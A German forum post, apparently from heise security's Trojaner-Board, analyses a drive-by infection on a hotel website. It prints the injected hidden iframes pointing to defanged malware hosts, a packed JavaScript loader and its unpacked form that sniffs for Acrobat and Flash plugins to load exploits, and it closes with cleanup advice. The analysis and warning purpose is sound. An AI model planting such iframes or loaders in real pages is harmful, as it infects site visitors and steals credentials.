THC
Techboardgnom,
aus dem trojaner-board von heise security:
das ist eine klassiche drive-by-infection durch ältere fehlerbehaftete browserplugins.
am vergangenen donnerstag hat mich ein verwandter darauf aufmerksam
gemacht, dass die seite eines hotels in oberhof (die website wurde
inzwischen gesäubert) plötzlich auf der warnliste von firefox stand.
die website wies eine doppelte injektion mit dem folgenden code auf:
<iframe src="hxxp://shopfilmlifeonline.cn:8080/index.php" width=103
height=173 style="visibility: hidden"></iframe>
ich habe such schon diese variante gesehen:
<iframe src="hxxp://shopvideocommission.cn:8080/index.php" width=103
height=173 style="visibility: hidden"></iframe>
diese domainnamen werden jeweils zu fünf ip-adressen aufgelöst, die
nicht statisch sind. sie führen auf wiederum (vermutlich über
gestohlene ftp-zugänge) infizierte webpräsenzen, die auf dem port
8080 als malware-auslieferer fungieren.
das primäre script (index.php) überprüft die ip-adresse und liefert
folgenden code aus (eval durch evla ersetzt):
<html>
<body>
<script>
evla(function(p,a,c,k,e,d){e=function(c){return
c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a
)]=k[c]||c.toString(a)}k=[function(e){return
d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replac
e(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('g
5(){m{l(i=0;i<=8.7.j;i++){2=8.7.2;a((2.4("6 k")!=-1)||(2.4("6
r")!=-1)){9.b(\'<3 c="d/p.q"></3>\')}a(2.4("o")!=-1){9.b(\'<3
c="d/n.f"></3>\')}}}h(e){}}5();',28,28,'||name|iframe|indexOf|Fa5zfha
1|Adobe|plugins|navigator|document|if|write|src|cache||swf|function|c
atch||length|Acrobat|for|try|flash|Flash|readme|pdf|PDF'.split('|'),0
,{}))
</script>
</body>
</html>
mit malzilla lässt sich der code ausführen - das ergebnis ist ein
script, dass in der liste der installierten browseraddons nach
acrobat und flash schaut und bei anwesenheit derer die beiden
exploits von dem jeweiligen malware-server nachlädt (function
maskiert):
funxxion
Fa5zfha1(){try{for(i=0;i<=navigator.plugins.length;i++){name=navigato
r.plugins.name;if((name.indexOf("Adobe
Acrobat")!=-1)||(name.indexOf("Adobe
PDF")!=-1)){document.write('<iframe
src="cache/readme.pdf"></iframe>')}if(name.indexOf("Flash")!=-1){docu
ment.write('<iframe
src="cache/flash.swf"></iframe>')}}}catch(e){}}Fa5zfha1();
diese beiden dateien sind nicht ganz neu - virustotal liefert eine
recht gute erkennung. damit die exploits funktioneren, muss der flash
player schon etwas angestaubt sein (9.0.115 oder früher) oder man
benutzt noch den acrobat/adobe reader 8.1.2 oder früher.
beide expoits laden im erfolfgsfall den eigentlichen schädling von
den malware-servern herunter und führen in aus (drive-by infection).
er landet (auch mit einfachen benutzerrechten) als exe-datei direkt
im autostart-ordner des nutzers (rncsvc32.exe). wird er ausgeführt,
lautet der prozessname "svchost.exe" - alledings läuft er mit den
rechten des benutzers. er nimmt kontakt mit einem server in der
ukraine auf und steht im verdacht, ftp-daten auszuspähen.
über virustotal erkannten am freitag nur 3 scanner diese neue
variante - heute sind es schon 14.
- überprüft eure webseiten auf verdächtigen code.
- überprüft eure rechner auf den befall.
- ändert von einem sauberen rechner aus ggf. die ftp-zugangsdaten von
webpräsenzen
das ist eine klassiche drive-by-infection durch ältere fehlerbehaftete browserplugins.